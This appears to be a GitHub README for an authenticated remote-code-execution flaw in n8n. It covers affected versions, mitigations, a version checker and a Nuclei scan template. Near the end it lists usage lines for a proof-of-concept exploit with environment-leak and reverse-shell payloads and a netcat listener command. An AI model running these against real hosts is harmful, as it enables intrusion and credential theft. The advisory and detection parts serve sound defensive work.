# 🚨 CVE-2025-68613 — Critical RCE in n8n

![n8nblog](https://github.com/user-attachments/assets/26ffef99-3255-4f83-b8f3-a2f98fbb03f2)

> **Severity:** 🔴 Critical
> **Impact:** Remote Code Execution
> **Affected Platform:** n8n (workflow automation)

---

### 🧩 Overview

**CVE-2025-68613** is a **critical security vulnerability** in **n8n**, an open-source workflow automation platform.
The issue allows an **authenticated attacker** to execute **arbitrary code on the server** by abusing how workflow expressions are evaluated.

---

## 🎯 Vulnerability Details

* **Type:** Expression Injection → Remote Code Execution
* **CWE:** CWE-913 — Improper Control of Dynamically-Managed Code Resources
* **Attack Vector:** Network
* **Privileges Required:** Low (authenticated user)
* **User Interaction:** None
* **Scope:** Changed

💥 **Why it’s dangerous:**
Malicious expressions are evaluated in a context that is **not properly sandboxed**, allowing access to the underlying runtime.

---

## 🧨 Potential Impact

![G8vg8GbXkAAJan2](https://github.com/user-attachments/assets/c0f461ec-0377-4f32-a485-e5457def077e)

If exploited, an attacker could:

* 🖥️ Execute arbitrary system commands
* 🔐 Steal credentials, tokens, and secrets
* 🧬 Modify or backdoor workflows
* 📤 Exfiltrate sensitive data
* 💣 Fully compromise the n8n host

The attack runs with the **same privileges as the n8n service**, amplifying its impact.

---

## 📊 Severity Metrics

| Metric              | Value     |
| ------------------- | --------- |
| **CVSS v3.1**       | ~9.9–10.0 |
| **Confidentiality** | High      |
| **Integrity**       | High      |
| **Availability**    | High      |

➡️ Authentication is required, but **no admin access** is needed.

---

## 🧪 Affected Versions

🚫 **Vulnerable:**

* `0.211.0` → `1.120.3`
* `1.121.0`

✅ **Patched:**

* `1.120.4`
* `1.121.1`
* `1.122.0` and newer

---

## 🛠️ Remediation & Mitigation

### ✅ Recommended (Best Option)

* **Upgrade immediately** to a fixed version

### ⚠️ Temporary Risk Reduction

*(Does NOT fully remove the vulnerability)*

* Restrict workflow creation/editing to **trusted users only**
* Run n8n with **minimal OS privileges**
* Isolate the service (containers, VM, restricted filesystem)
* Limit network exposure (VPN, firewall rules)
* Enable logging and monitor workflow changes

---

## 🧠 Quick Reference

| Category          | Info                  |
| ----------------- | --------------------- |
| **CVE ID**        | CVE-2025-68613        |
| **Product**       | n8n                   |
| **Bug Class**     | Expression Injection  |
| **Result**        | Remote Code Execution |
| **Access Needed** | Authenticated user    |
| **Fix Available** | Yes                   |


------

---

## ✅ `CVE-2025-68613.py` — Remote Version & Exposure Checker (Safe)

### 🧪 Example Usage

```bash
sudo python3 CVE-2025-68613.py -u http://127.0.0.1:5678
```

### Example Output

```text
[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2

--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613
```

---

### How do I run this script?

1. Download and install *Nuclei.*
2. Clone this repostory to your local system.
3. Run the following command:

````
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -u http://targets:5678
````

Or if you would like to scan a list of hosts, execute:

````
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -l targets.txt
````

Example Output

<img width="1018" height="600" alt="nuclei" src="https://github.com/user-attachments/assets/c2a57e18-b09e-4dc4-bca3-d5c246df0d03" />


-------

**Usage examples:**

- Leak environment variables:  
  `python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload env_leak`

- Get user info:  
  `python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload id`

- Reverse shell (start listener first: `nc -lvnp 4444`):  
  `python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload reverse_shell --attacker_ip YOUR_IP --attacker_port 4444`

This script is for authorized security testing only on systems you own or have explicit permission to test.

-------

## ⚠️ **DISCLAIMER** ⚠️

🔒 This script is a **Proof-of-Concept (PoC)** exploit for **CVE-2025-68613** in n8n.

📚 It is provided **strictly for educational purposes** and **authorized security testing only**.

🛡️ Use **exclusively** on systems you **own**, **control**, or have **explicit written permission** to test.

🚫 **Unauthorized use** against any system is **illegal** and may violate laws (e.g., computer fraud and abuse acts).

❌ The author and any associated parties assume **no liability** for misuse, damage, or legal consequences.

✅ Use **responsibly**, **ethically**, and in full compliance with all applicable laws and regulations.

🔐 If conducting penetration testing, ensure proper authorization (e.g., Rules of Engagement) is in place.

🛠️ Security researchers may use this to verify vulnerabilities and encourage timely patching.

---

